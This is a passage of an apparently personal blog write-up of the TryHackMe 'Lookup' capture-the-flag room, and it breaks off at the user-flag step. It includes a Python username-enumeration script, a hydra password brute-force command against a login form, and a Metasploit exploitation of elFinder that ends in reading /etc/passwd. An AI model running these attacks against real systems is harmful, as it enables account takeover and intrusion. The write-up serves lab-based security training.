---
title: "THM - Lookup"
date: 2025-06-02
image: /assets/img/lookup/lookup.png
tas:
  [tryhackme, writeups, linux, elfinder, metasploit, python, gtfobins]
categories: [TryHackMe, Writeup, CTF, Easy]
redirect_from: /2025/06/02/lookup/
---

Hello world,

Writeup about [TryHackMe](https://tryhackme.com) room : [Lookup](https://tryhackme.com/r/room/lookup) - Easy

## Enumeration

Given only the IP by THM, the first thing to do is to start an nmap scan on target to gather informations about opened ports

```shell
nmap -sV $target
```

It shows two open ports :
- 22/tcp - SSH
- 80/tcp - HTTP

We first take a look at the webserver, that redirect us tu `lookup.thm`. We can add this FQDN to our `/etc/hosts` file.

## Website

Seeing a login page, the first things that comes to mind are trying easy SQLi, XSS and default/weak credentials. When trying users like `root` or `admin`, we see differents error messages, giving indications on wether the username is valid or not. The game plan will be to bruteforce usernames to find valid one, and with those found usernames, bruteforce passwords.

### Bruteforce usernames

To get usernames, I wrote a python scripts that tries usernames, and check the error message to determine if the user does exist.

```python
import requests

URL = "http://lookup.thm/login.php"
WORDLIST = "/usr/share/wordlists/SecLists/Usernames/Names/names.txt"

if __name__ == "__main__":
    with open(WORDLIST, "r") as file:
        for username in map(str.strip, file):
            if username:
                res = requests.post(URL, data={"username": username, "password": "xxx"})
                if "Wrong password" in res.text:
                    print(f"Found: {username}")
```

After executing the script, we get two valid usernames :
- admin
- jose

### Bruteforce passwords

Let's bruteforce password using hydra

`hydra -l jose -P /usr/share/wordlist/rockyou.txt -f lookup.thm http-form-post "/login.php:username=^USER^&password=^PASS^:Wrong"`

We find the password of the user, we can login.

### ElFinder

After logging in, the website redirect us to `files.lookup.thm`, we add this to our `/etc/hosts` file.

We are presented an elfinder webpage.

Using searchploit, we see multiple vulnerabilities available

```shell
searchploit elfinder
```

Upon searching for anything on the page, we find the version of the app. We  see that an exploit does work.
We use metasploit to exploit this vulnerability.

We get an access meterpreter to `www-data`

## Finding user flag

We cat `/etc/passwd` and we see an user with root : "Think"


